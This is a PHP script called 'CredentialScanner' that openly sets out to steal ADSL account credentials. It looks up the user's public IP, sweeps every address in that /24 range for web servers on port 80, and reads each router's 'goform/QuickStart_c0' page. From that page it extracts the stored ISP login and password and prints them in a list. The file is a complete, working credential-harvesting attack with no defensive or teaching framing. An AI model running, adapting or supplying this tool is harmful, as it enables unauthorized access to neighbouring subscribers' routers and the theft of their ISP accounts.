PHP : CrendentialScanner v01


<?php
	/* CONFIGURATION */
		$config["ip_server"] = "http://www.whatismyip.com";
	/* END OF CONFIGURATION */

	/* ------ DON'T MODIFY ANYTHING BEYOND THIS LINE IF YOU'RE NOT SURE WHAT PHP IS !!! ------- */
	
	echo "\n\n\t*********************************************************\n".
		 "\t*                                                       *\n".
		 "\t* CredentialScanner --  (CScan v.01)                    *\n".
		 "\t* -- The automatic way to find adsl account credentials *\n".
		 "\t*                                                       *\n".
		 "\t*          Brought to you by the power of the wired !   *\n".
		 "\t*                                                       *\n".
		 "\t*********************************************************\n\n\n";
	
	// This function allow the program to grab the local ip, even through a gateway device.
	function getLocalIP($server){
		echo "connecting to ".$server." ...\n";
		$handle = @fopen($server,"r");
		
		if($handle){
			$content = fread($handle,200);
			$val = preg_match("`((((1|0)?[0-9]{1,2}|25[0-5]|2[0-4][0-9])\.){3}((1|0)?[0-9]{1,2}|25[0-5]|2[0-4][0-9]))`",$content,$ip);

			if(!$val){
				return 2;
			}else{
				echo "fetching data ...\n";
				return $ip[1];
			}
		}else{
			return 1;
		}
	}
	
	// Return de c class from an ip adress
	function c_class($ip){
		return substr($ip,0,strrpos($ip,"."));
	}
	
	function validate_url($url){
		if( preg_match("`^((http|https|ftp)://)?(www\.)?([0-9a-zA-Z]+(-[0-9a-z-A-Z]+)*)\.[a-zA-Z]{2,3}$`",$url) ){
			return true;
		}else{
			return false;
		}
	}
	
	function emsg($msg){
		echo "[!!] ".$msg."\n";
		exit(-1);
	}
	
	function wmsg($msg){
		echo "[warning] ".$msg."\n";
	}
	
	function imsg($msg){
		echo "\n\t-- ".$msg." \n\n";
	}
	
	function handle_error($error){
		switch($error){
			case 1:	emsg("Unable to connect to ip server"); break;
			case 2: emsg("Unable to find any ip adress on the specified server"); break;
			case 3: wmsg("Invalid url for ip server [protocol://(www.)domain.ext]"); break;
			case 4: wmsg("Unable to find the credentials on the target page (honeypot???)"); break;
			case 5: wmsg("Unable to reach the target page"); break;
			default: emsg("Unknown error !!!");
		}
	}
	
	function is_alive($ip){
		$host = @gethostbyaddr($ip);
		if( $host == $ip ){
			echo "target ".$ip." isn't alive\n";
			return false;
		}else{
			echo $host." is alive, testing port 80 (http) ...\n";
			if( !$handle = @fsockopen($ip, 80, $errno, $errstr, 10)){
				echo "target ".$ip." is not open on port 80 (http)\n";
				return false;
			}else{
				imsg("target ".$ip." open on port 80 (http)");
				if($handle) @fclose($handle);
				return true;
			}
		}
	}
	
	function the_function_who_is_more_evil_than_the_dervish_evil_ahahaha($url){
		echo "trying to get account credentials !!\n";

		$handle = @fopen($url."goform/QuickStart_c0","r");
		
		if($handle){
			$buffer = "";
			while (!feof($handle)) $buffer .= fgets($handle, 4096);
		    fclose($handle);
			
			$val = preg_match_all("`value='([a-zA-Z0-9@]+)'`",$buffer,$ac);

			if(!$val){
				return 4;
			}else{
				echo "\n\tcredentials : \n";
				echo "\t\tLogin: ".$ac[1][0];
				echo "\n\t\tPassword: ".$ac[1][1];
				echo "\n\n";
				return array($ac[1][0],$ac[1][1]);
			}
		}else{
			return 5;
		}
	}
	
	function main(){
		global $config;
		
		if( !validate_url($config["ip_server"]) ) handle_error(3);
		$ip = getLocalIp($config["ip_server"]);
		
		if(is_int($ip)){
			handle_error($ip);
		}else{
			imsg("your ip adress is : ".$ip);
		}
		
		$cc = c_class($ip);
		echo "your c class: ".$cc."\n";
		
		$cred = array();
		for($i=1; $i<255; $i++):
			$newip = $cc.".".$i;
			if( $newip != $ip):
				echo "testing if ".$newip." is alive\n";
				if( is_alive($newip)):
					$rep = the_function_who_is_more_evil_than_the_dervish_evil_ahahaha("http://".$newip."/");
					if( is_int($rep) ){
						handle_error($rep);
					}else{
						$cred[] = $rep;
					}
				endif;
			endif;
		endfor;
		
		echo "\n-------------------- Scan terminated --------------------\n";
		
		echo "\nListing:\n";
		echo "\tlogin\t\tpassword\n\n";
		foreach($cred as $c):
			echo "\t".$c[0]."\t".$c[1]."\n";
		endforeach;
		
		echo "\n\n\t[exiting software... entering realworld stage]\n";
	}
	
	main();
?>